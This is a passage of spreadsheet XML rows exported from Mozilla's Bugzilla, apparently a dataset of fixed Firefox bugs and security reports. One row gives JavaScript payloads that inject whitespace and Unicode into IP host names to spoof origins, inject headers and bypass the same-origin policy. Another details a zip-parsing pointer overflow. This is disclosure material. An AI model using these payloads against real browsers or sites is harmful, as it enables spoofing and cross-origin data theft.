      <c r="A5355" t="n">
        <v>1809122</v>
      </c>
      <c r="B5355" t="inlineStr">
        <is>
          <t>2023-01-09 02:17:24 -0800</t>
        </is>
      </c>
      <c r="C5355" t="inlineStr">
        <is>
          <t>Drag-and-drop of a URL from inside a cross-origin iframe should not be allowed to drop in the same tab if the iframe get removed during dragging (cross-origin attacks and spoofs)</t>
        </is>
      </c>
      <c r="D5355" t="inlineStr">
        <is>
          <t>2024-05-30 11:03:42 -0700</t>
        </is>
      </c>
      <c r="E5355" t="n">
        <v>1</v>
      </c>
      <c r="F5355" t="n">
        <v>1</v>
      </c>
      <c r="G5355" t="n">
        <v>3</v>
      </c>
      <c r="H5355" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5355" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5355" t="inlineStr">
        <is>
          <t>DOM: Copy &amp; Paste and Drag &amp; Drop</t>
        </is>
      </c>
      <c r="K5355" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5355" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5355" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5355" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5355" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5355" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main111+][adv-esr102.9+]</t>
        </is>
      </c>
      <c r="Q5355" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5355" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S5355" t="inlineStr">
        <is>
          <t>112 Branch</t>
        </is>
      </c>
      <c r="T5355" t="n">
        <v>1</v>
      </c>
      <c r="U5355" t="n">
        <v>0</v>
      </c>
      <c r="V5355" t="n">
        <v>25</v>
      </c>
      <c r="W5355" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #1794268 +++
The patch in bug #1794268 does fix the issue of dragging a link from cross-origin iframe and dropping it outside of the iframe, but if the iframe get removed during dragging, we still trigger a navigation.</t>
        </is>
      </c>
      <c r="X5355" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5356">
      <c r="A5356" t="n">
        <v>264873</v>
      </c>
      <c r="B5356" t="inlineStr">
        <is>
          <t>2004-10-18 04:50:12 -0700</t>
        </is>
      </c>
      <c r="C5356" t="inlineStr">
        <is>
          <t>[FIXr]onblur="window.close  &lt;-- pressing tab makes it crash [@ PresShell::ScrollFrameIntoView]</t>
        </is>
      </c>
      <c r="D5356" t="inlineStr">
        <is>
          <t>2018-08-29 15:20:51 -0700</t>
        </is>
      </c>
      <c r="E5356" t="n">
        <v>1</v>
      </c>
      <c r="F5356" t="n">
        <v>1</v>
      </c>
      <c r="G5356" t="n">
        <v>3</v>
      </c>
      <c r="H5356" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5356" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5356" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K5356" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5356" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5356" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5356" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5356" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5356" t="inlineStr"/>
      <c r="Q5356" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5356" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5356" t="inlineStr">
        <is>
          <t>mozilla1.8beta1</t>
        </is>
      </c>
      <c r="T5356" t="n">
        <v>1</v>
      </c>
      <c r="U5356" t="n">
        <v>0</v>
      </c>
      <c r="V5356" t="n">
        <v>10</v>
      </c>
      <c r="W5356" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.3) Gecko/20040910
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.3) Gecko/20040910
guess the same as https://bugzilla.mozilla.org/show_bug.cgi?id=239563 , but on
tab press
Reproducible: Always
Steps to Reproduce:
1. open a window using window.open
2. make sure the popup contains OnBlur="javascript:window.close()"
3. press TAB having the popup focussed
Actual Results:  
mozilla exited, error occured
Expected Results:  
window close or stay, dont really matter
tried on 1.7.2, 1.7.3 and 2 other pc's</t>
        </is>
      </c>
      <c r="X5356" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5357">
      <c r="A5357" t="n">
        <v>991471</v>
      </c>
      <c r="B5357" t="inlineStr">
        <is>
          <t>2014-04-02 21:39:07 -0700</t>
        </is>
      </c>
      <c r="C5357" t="inlineStr">
        <is>
          <t>nsStandardURL::SetHost called net_ToLowerCase with a bogus pointer</t>
        </is>
      </c>
      <c r="D5357" t="inlineStr">
        <is>
          <t>2015-08-30 12:01:05 -0700</t>
        </is>
      </c>
      <c r="E5357" t="n">
        <v>1</v>
      </c>
      <c r="F5357" t="n">
        <v>1</v>
      </c>
      <c r="G5357" t="n">
        <v>3</v>
      </c>
      <c r="H5357" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5357" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5357" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K5357" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5357" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5357" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5357" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5357" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5357" t="inlineStr">
        <is>
          <t>[adv-main29+][adv-esr24.5+]</t>
        </is>
      </c>
      <c r="Q5357" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5357" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5357" t="inlineStr">
        <is>
          <t>mozilla31</t>
        </is>
      </c>
      <c r="T5357" t="n">
        <v>1</v>
      </c>
      <c r="U5357" t="n">
        <v>0</v>
      </c>
      <c r="V5357" t="n">
        <v>25</v>
      </c>
      <c r="W5357" t="inlineStr">
        <is>
          <t>Created attachment 8401080
testcase (crashes Firefox when loaded)
Nightly: bp-aabf8718-c548-4461-83b9-182822140403</t>
        </is>
      </c>
      <c r="X5357" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5358">
      <c r="A5358" t="n">
        <v>1199430</v>
      </c>
      <c r="B5358" t="inlineStr">
        <is>
          <t>2015-08-27 13:15:34 -0700</t>
        </is>
      </c>
      <c r="C5358" t="inlineStr">
        <is>
          <t>White-spaces in host IP address, leading to same origin policy bypass</t>
        </is>
      </c>
      <c r="D5358" t="inlineStr">
        <is>
          <t>2024-05-30 09:04:47 -0700</t>
        </is>
      </c>
      <c r="E5358" t="n">
        <v>1</v>
      </c>
      <c r="F5358" t="n">
        <v>1</v>
      </c>
      <c r="G5358" t="n">
        <v>3</v>
      </c>
      <c r="H5358" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5358" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5358" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K5358" t="inlineStr">
        <is>
          <t>40 Branch</t>
        </is>
      </c>
      <c r="L5358" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5358" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5358" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5358" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5358" t="inlineStr">
        <is>
          <t>[adv-main42+][adv-esr38.4+]</t>
        </is>
      </c>
      <c r="Q5358" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5358" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5358" t="inlineStr">
        <is>
          <t>mozilla44</t>
        </is>
      </c>
      <c r="T5358" t="n">
        <v>1</v>
      </c>
      <c r="U5358" t="n">
        <v>0</v>
      </c>
      <c r="V5358" t="n">
        <v>55</v>
      </c>
      <c r="W5358" t="inlineStr">
        <is>
          <t>It is possible to add white-space characters in host names being IP addresses, which can lead to some security issues, including same origin policy bypass.
Here's an example:
1. 176.58.110.151 is an IP address of host sekurak.securitum.com.
2. Enter the following line in JS console (you can replace \x0b with \x0c as well):
location = 'http://176.58.110.151\x0bRANDOM_STUFF_HERE&lt;html&gt;'
3.  Host name is still resolved to 176.58.110.151, while the host header will contain the string "176.58.110.151\x0bRANDOM_STUFF_HERE&lt;html&gt;". The same applies to document.domain and location.origin.
Furthermore, using location.host or location.hostname, it is also possible to include new-line (0x0A) and tab (0x09) in host names. The former allows to request header injection attack.
location.host = '176.58.110.151\nApache_will_complain_about_bad_request'
Using unicode transliteration in DNS names, you can also put "@" character there. Interestingly, in the case below, a favicon will be set to the one of youtube.com:
location.host = '176.58.110.151\x0b\uff20www.youtube.com'
I can think of a few scenarios abusing this behaviour:
1. Phishing attempts: for less cautious users domains like: "176.58.110.151\x0b.accouts.google.com" might look genuine. The address bar even highlights "google.com"
2. Some postMessage implementations verify origin by checking its last characters. So any checks based on the scheme: `if (origin.endsWith(".example.com"))` will fail with host "176.58.110.151\x0bx.example.com".
3. Request header injection might be abused to perform some attacks, not usually possible with web browsers, like shellshock.
4. The most interesting one: bypass same origin policy - with help of Flash Plugin (which is a pretty common scenario). The notable exception here is, however, that it only works for http requests; it is not possible to do that in HTTPS because you can't have a valid certificate to any &lt;ip_address&gt;&lt;white_space&gt;&lt;stuff&gt; domain name.
I have created a PoC here: http://sekurak.securitum.com/fx_sop_bypass942958/
You just enter an URL and it is fetched into an &lt;pre&gt; element. The idea is as follows:
1. There's a flash file using URLLoader and URLRequest classes. Using these, you can download any URL given that it is in the same origin as the flash file.
2. The URL of the flash file is abusing the "@" trick shown earlier. For example: when you try to fetch a resource from http://translate.google.com, the flash file is fetched from domain "176.58.110.151\x0b\uff20translate.google.com" that gets transliterated to "176.58.110.151\x0b@translate.google.com".
3. Firefox fetches the file from 176.58.110.151 but Flash assumes it is run in http://translate.google.com origin hence allowing to get any resource from http://translate.google.com.
Please let me know if you have any further questions.</t>
        </is>
      </c>
      <c r="X5358" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5359">
      <c r="A5359" t="n">
        <v>1050340</v>
      </c>
      <c r="B5359" t="inlineStr">
        <is>
          <t>2014-08-07 09:23:04 -0700</t>
        </is>
      </c>
      <c r="C5359" t="inlineStr">
        <is>
          <t>Structured clone should not unwrap security wrappers during traversal</t>
        </is>
      </c>
      <c r="D5359" t="inlineStr">
        <is>
          <t>2016-06-04 16:02:06 -0700</t>
        </is>
      </c>
      <c r="E5359" t="n">
        <v>1</v>
      </c>
      <c r="F5359" t="n">
        <v>1</v>
      </c>
      <c r="G5359" t="n">
        <v>3</v>
      </c>
      <c r="H5359" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5359" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5359" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K5359" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5359" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5359" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5359" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5359" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5359" t="inlineStr">
        <is>
          <t>[adv-main34+]</t>
        </is>
      </c>
      <c r="Q5359" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5359" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5359" t="inlineStr">
        <is>
          <t>mozilla34</t>
        </is>
      </c>
      <c r="T5359" t="n">
        <v>1</v>
      </c>
      <c r="U5359" t="n">
        <v>0</v>
      </c>
      <c r="V5359" t="n">
        <v>27</v>
      </c>
      <c r="W5359" t="inlineStr">
        <is>
          <t>I realized this as a potential issue when reviewing bug 1038716.
With the work I've done this summer in bug 914970 and bug 856067, we now have a much stronger security membrane to protect privileged code from getting confused by unprivileged non-DOM objects. In order for these wrappers to do their job though, we need to be careful about the places where we strip them off.
In general, CheckedUnwrap allows wrappers to be removed when the wrapper subsumes the wrappee. This is generally what we want, since it allows chrome to do document.getElementById.call(contentDocument, 'foo') and whatnot.
We also use CheckedUnwrap in the Structured Clone algorithm to handle wrappers encountered when traversing the object graph, which is what I'm concerned about here. When chrome manipulates a content Object or Array, the XrayWrappers filter out tricky stuff like getter properties, and properties that shadow the standard prototype.
So when Mike does his input validation in bug 1038716, the object may _seem_ correct. But when he then passes that object to IndexedDB, the serialization will strip off the security wrapper, and invoke getters for properties that didn't appear to exist from the Xray side. This stuff then ends up in the object store, and gets pulled out later. Yikes.
I think the simplest thing to do here is to perform a reverse-subsumes check in the structured clone code. We can give consumers the option to explicitly clone an unprivileged object with Cu.cloneInto (which is what Mike is going to need to do) by making xpc::CloneInto do its own CheckedUnwrap (sans subsumes check) on the starting object.
Doing this is important for defense-in-depth.</t>
        </is>
      </c>
      <c r="X5359" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5360">
      <c r="A5360" t="n">
        <v>1167888</v>
      </c>
      <c r="B5360" t="inlineStr">
        <is>
          <t>2015-05-23 14:43:44 -0700</t>
        </is>
      </c>
      <c r="C5360" t="inlineStr">
        <is>
          <t>nsZipArchive::BuildFileList has memory-safety bug</t>
        </is>
      </c>
      <c r="D5360" t="inlineStr">
        <is>
          <t>2024-05-30 09:01:33 -0700</t>
        </is>
      </c>
      <c r="E5360" t="n">
        <v>1</v>
      </c>
      <c r="F5360" t="n">
        <v>1</v>
      </c>
      <c r="G5360" t="n">
        <v>3</v>
      </c>
      <c r="H5360" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5360" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5360" t="inlineStr">
        <is>
          <t>Networking: JAR</t>
        </is>
      </c>
      <c r="K5360" t="inlineStr">
        <is>
          <t>38 Branch</t>
        </is>
      </c>
      <c r="L5360" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5360" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5360" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5360" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5360" t="inlineStr">
        <is>
          <t>[adv-main39+][adv-esr38.1+][adv-esr31.8+]</t>
        </is>
      </c>
      <c r="Q5360" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5360" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5360" t="inlineStr">
        <is>
          <t>mozilla41</t>
        </is>
      </c>
      <c r="T5360" t="n">
        <v>1</v>
      </c>
      <c r="U5360" t="n">
        <v>0</v>
      </c>
      <c r="V5360" t="n">
        <v>18</v>
      </c>
      <c r="W5360" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows; rv:***) Gecko/20100101 Firefox/**.*
Build ID: 20150305021524
Steps to reproduce:
An attacker could force nsZipArchive::BuildFileList to read memory that it does not own, possibly leading to a crash, disclosure of sensitive information, or execution of code chosen by an attacker.
The problem is in the function's failure to validate the offsets of zip central directories.
Code beginning at line 624 extracts the first central directory offset from the zip-end record:
624:    for (buf = endp - ZIPEND_SIZE; buf &gt; startp; buf--)
625:      {
626:        if (xtolong(buf) == ENDSIG) {
627:          centralOffset = xtolong(((ZipEnd *)buf)-&gt;offset_central_dir);
628:          break;
629:        }
630:      }
631:  }
Line 637 then sets the buffer pointer buf to "startp + centralOffset" without doing more than a cursory validation of centralOffset:
632:
633:  if (!centralOffset)
634:    return NS_ERROR_FILE_CORRUPTED;
635:
636:  //-- Read the central directory headers
637:  buf = startp + centralOffset;
The code then uses buf to find and read central directories:
638:  uint32_t sig = 0;
639:  while (buf + int32_t(sizeof(uint32_t)) &lt;= endp &amp;&amp;
640:         (sig = xtolong(buf)) == CENTRALSIG) {
641:    // Make sure there is enough data available.
642:    if (endp - buf &lt; ZIPCENTRAL_SIZE)
643:      return NS_ERROR_FILE_CORRUPTED;
644:
645:    // Read the fixed-size data.
646:    ZipCentral* central = (ZipCentral*)buf;
647:
648:    uint16_t namelen = xtoint(central-&gt;filename_len);
649:    ... // lots more where that came from
The problem occurs if the first-encountered zip-end record contains an offset_central_dir field that is very large, thus making centralOffset very large. In this case, the RHS of line 637 can overflow (especially on 32-bit platforms), setting buf to somewhere &lt; startp. Since buf is then perforce &lt; endp, this does not trip the check on line 639.
If *buf happens to contain CENTRALSIG, the code at line 638 et seq interprets it as a valid central directory, with unpredictable consequences further down the road when it's used. I guess that this defect could be used, for example, to inject Javascript from domain A into domain B.
This bug might explain https://bugzilla.mozilla.org/show_bug.cgi?id=596826 .</t>
        </is>
      </c>
      <c r="X5360" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5361">
      <c r="A5361" t="n">
        <v>1309823</v>
      </c>
      <c r="B5361" t="inlineStr">
        <is>
          <t>2016-10-13 01:56:14 -0700</t>
        </is>
      </c>
      <c r="C5361" t="inlineStr">
        <is>
          <t>Crash in nsTArray_base&lt;T&gt;::SwapArrayElements&lt;T&gt; | nsTArray_Impl&lt;T&gt;::SwapElements&lt;T&gt; | mozilla::ipc::FileDescriptorSetChild::ForgetFileDescriptors</t>
        </is>
      </c>
      <c r="D5361" t="inlineStr">
        <is>
          <t>2017-06-13 07:33:09 -0700</t>
        </is>
      </c>
      <c r="E5361" t="n">
        <v>1</v>
      </c>
      <c r="F5361" t="n">
        <v>1</v>
      </c>
      <c r="G5361" t="n">
        <v>3</v>
      </c>
      <c r="H5361" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5361" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5361" t="inlineStr">
        <is>
          <t>DOM: Service Workers</t>
        </is>
      </c>
      <c r="K5361" t="inlineStr">
        <is>
          <t>49 Branch</t>
        </is>
      </c>
      <c r="L5361" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5361" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N5361" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5361" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5361" t="inlineStr"/>
      <c r="Q5361" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5361" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5361" t="inlineStr">
        <is>
          <t>mozilla52</t>
        </is>
      </c>
      <c r="T5361" t="n">
        <v>1</v>
      </c>
      <c r="U5361" t="n">
        <v>0</v>
      </c>
      <c r="V5361" t="n">
        <v>32</v>
      </c>
      <c r="W5361" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-6e8fc599-f021-4b0c-b5a3-cda7d2161013.
=============================================================
Crashing Thread (27)
Frame 	Module 	Signature 	Source
0 	xul.dll 	nsTArray_base&lt;nsTArrayInfallibleAllocator, nsTArray_CopyWithMemutils&gt;::SwapArrayElements&lt;nsTArrayInfallibleAllocator, nsTArrayInfallibleAllocator&gt;(nsTArray_base&lt;nsTArrayInfallibleAllocator, nsTArray_CopyWithMemutils&gt;&amp;, unsigned int, unsigned int) 	obj-firefox/dist/include/nsTArray-inl.h:346
1 	xul.dll 	nsTArray_Impl&lt;nsCOMPtr&lt;nsIRunnable&gt;, nsTArrayInfallibleAllocator&gt;::SwapElements&lt;nsTArrayInfallibleAllocator&gt;(nsTArray_Impl&lt;nsCOMPtr&lt;nsIRunnable&gt;, nsTArrayInfallibleAllocator&gt;&amp;) 	obj-firefox/dist/include/nsTArray.h:1661
2 	xul.dll 	mozilla::ipc::FileDescriptorSetChild::ForgetFileDescriptors(nsTArray&lt;mozilla::ipc::FileDescriptor&gt;&amp;) 	ipc/glue/FileDescriptorSetChild.cpp:28
3 	xul.dll 	mozilla::ipc::`anonymous namespace'::CleanupIPCStream 	ipc/glue/IPCStreamUtils.cpp:183
4 	xul.dll 	mozilla::ipc::AutoIPCStream::~AutoIPCStream() 	ipc/glue/IPCStreamUtils.cpp:343
5 	xul.dll 	mozilla::UniquePtr&lt;mozilla::ipc::AutoIPCStream, mozilla::DefaultDelete&lt;mozilla::ipc::AutoIPCStream&gt; &gt;::reset(mozilla::ipc::AutoIPCStream*) 	obj-firefox/dist/include/mozilla/UniquePtr.h:342
6 	xul.dll 	mozilla::dom::cache::AutoChildOpArgs::~AutoChildOpArgs() 	dom/cache/AutoUtils.cpp:141
7 	xul.dll 	mozilla::dom::cache::Cache::Put(mozilla::dom::RequestOrUSVString const&amp;, mozilla::dom::Response&amp;, mozilla::ErrorResult&amp;) 	dom/cache/Cache.cpp:421
8 	xul.dll 	mozilla::dom::CacheBinding::put 	obj-firefox/dom/bindings/CacheBinding.cpp:873
9 	xul.dll 	mozilla::dom::CacheBinding::put_promiseWrapper 	obj-firefox/dom/bindings/CacheBinding.cpp:893
this signature is regressing in 50.0b builds and is mainly happening in the content process. in 50.0b6 they are currently accounting for 3% of all content crashes.
some correlations for the signature on 50.0b:
(100.0% in signature vs 00.23% overall) address = 0xffffffffe5e5e5e9
(81.98% in signature vs 21.36% overall) "EGL?" in app_notes = true
(81.98% in signature vs 21.96% overall) "WebGL?" in app_notes = true
(100.0% in signature vs 40.37% overall) reason = EXCEPTION_ACCESS_VIOLATION_READ
(72.97% in signature vs 20.35% overall) "EGL+" in app_notes = true
(80.18% in signature vs 27.71% overall) dom_ipc_enabled = 1
(72.97% in signature vs 20.83% overall) "WebGL+" in app_notes = true
(72.97% in signature vs 21.48% overall) "GL Context+" in app_notes = true
(72.97% in signature vs 21.48% overall) "GL Context?" in app_notes = true</t>
        </is>
      </c>
      <c r="X5361" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5362">
      <c r="A5362" t="n">
        <v>1411037</v>
      </c>
      <c r="B5362" t="inlineStr">
        <is>
          <t>2017-10-23 13:46:35 -0700</t>
        </is>
      </c>
      <c r="C5362" t="inlineStr">
        <is>
          <t>Disable -Werror on -Wmultistatement-macros</t>
        </is>
      </c>
      <c r="D5362" t="inlineStr">
        <is>
          <t>2022-08-17 14:01:35 -0700</t>
        </is>
      </c>
      <c r="E5362" t="n">
        <v>1</v>
      </c>
      <c r="F5362" t="n">
        <v>1</v>
      </c>
      <c r="G5362" t="n">
        <v>7</v>
      </c>
      <c r="H5362" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5362" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="J5362" t="inlineStr">
        <is>
          <t>Source Code Analysis</t>
        </is>
      </c>
      <c r="K5362" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5362" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5362" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5362" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5362" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5362" t="inlineStr"/>
      <c r="Q5362" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5362" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5362" t="inlineStr">
        <is>
          <t>mozilla61</t>
        </is>
      </c>
      <c r="T5362" t="n">
        <v>1</v>
      </c>
      <c r="U5362" t="n">
        <v>0</v>
      </c>
      <c r="V5362" t="n">
        <v>6</v>
      </c>
      <c r="W5362" t="inlineStr">
        <is>
          <t>/root/firefox-gcc-last/xpcom/base/nsConsoleService.cpp: In member function 'virtual nsresult nsConsoleService::QueryInterface(const nsIID&amp;, void**)':
 /root/firefox-gcc-last/obj-x86_64-pc-linux-gnu/dist/include/nsISupportsImpl.h:970:5: error: macro expands to multiple statements [-Werror=multistatement-macros]
      foundInterface = 0;                                                       \
      ^~~~~~~~~~~~~~</t>
        </is>
      </c>
      <c r="X5362" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5363">
      <c r="A5363" t="n">
        <v>685186</v>
      </c>
      <c r="B5363" t="inlineStr">
        <is>
          <t>2011-09-07 09:16:18 -0700</t>
        </is>
      </c>
      <c r="C5363" t="inlineStr">
        <is>
          <t>Assertion failure: [infer failure] Missing type for arg 1 in jsinfer.cpp</t>
        </is>
      </c>
      <c r="D5363" t="inlineStr">
        <is>
          <t>2012-02-16 14:17:36 -0800</t>
        </is>
      </c>
      <c r="E5363" t="n">
        <v>1</v>
      </c>
      <c r="F5363" t="n">
        <v>1</v>
      </c>
      <c r="G5363" t="n">
        <v>3</v>
      </c>
      <c r="H5363" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5363" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5363" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5363" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5363" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5363" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5363" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5363" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5363" t="inlineStr">
        <is>
          <t>[sg:critical][qa+]</t>
        </is>
      </c>
      <c r="Q5363" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5363" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5363" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5363" t="n">
        <v>1</v>
      </c>
      <c r="U5363" t="n">
        <v>0</v>
      </c>
      <c r="V5363" t="n">
        <v>24</v>
      </c>
      <c r="W5363" t="inlineStr">
        <is>
          <t>I've crashed twice in the past 24 hours (on a self-built Linux debug build based on mozilla-central cf1ba8f0dbf71900bb24d77b5a63ad82c279b113 with the following:
Assertion failure: _PT_PTHREAD_MUTEX_IS_LOCKED(lock-&gt;mutex), at /home/dbaron/builds/ssd/mozilla-central/mozilla/nsprpub/pr/src/pthreads/ptsynch.c:227
The first of the two crashes I debugged a bit:
#6  0x00007f5f9781dab6 in abort () at abort.c:92
#7  0x00007f5f988f89aa in PR_Assert (
    s=0x7f5f9891df88 "_PT_PTHREAD_MUTEX_IS_LOCKED(lock-&gt;mutex)",
    file=0x7f5f9891de68 "/home/dbaron/builds/ssd/mozilla-central/mozilla/nsprpub
/pr/src/pthreads/ptsynch.c", ln=227)
    at /home/dbaron/builds/ssd/mozilla-central/mozilla/nsprpub/pr/src/io/prlog.c
:587
#8  0x00007f5f9890d4a7 in PR_Unlock (lock=0x13d5350)
    at /home/dbaron/builds/ssd/mozilla-central/mozilla/nsprpub/pr/src/pthreads/p
tsynch.c:227
#9  0x00007f5f95ef8460 in AutoUnlockGC (cx=0x7f5ef501a110,
    fmt=&lt;value optimized out&gt;)
    at /home/dbaron/builds/ssd/mozilla-central/mozilla/js/src/jscntxt.h:1822
#10 print (cx=0x7f5ef501a110, fmt=&lt;value optimized out&gt;)
    at /home/dbaron/builds/ssd/mozilla-central/mozilla/js/src/jsinfer.cpp:2314
#11 js::types::TypeFailure (cx=0x7f5ef501a110, fmt=&lt;value optimized out&gt;)
    at /home/dbaron/builds/ssd/mozilla-central/mozilla/js/src/jsinfer.cpp:338
#12 0x00007f5f962a7efb in js::mjit::stubs::AssertArgumentTypes (f=...)
    at /home/dbaron/builds/ssd/mozilla-central/mozilla/js/src/methodjit/StubCall
s.cpp:2470
#13 0x00007f5f71834b97 in ?? ()
This looks like we're doing AutoUnlockGC when the GC is not locked.
The script being executed was Google-plus related, though I think I may have actually been on https://www.google.com/reader/view/  (I'm not going to paste URLs of the script or the frame because they may have auth info...)</t>
        </is>
      </c>
      <c r="X5363" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5364">
      <c r="A5364" t="n">
        <v>904886</v>
      </c>
      <c r="B5364" t="inlineStr">
        <is>
          <t>2013-08-13 15:37:00 -0700</t>
        </is>
      </c>
      <c r="C5364" t="inlineStr">
        <is>
          <t>All property definition must enforce ES5's invariants regarding configurability, writability, etc.</t>
        </is>
      </c>
      <c r="D5364" t="inlineStr">
        <is>
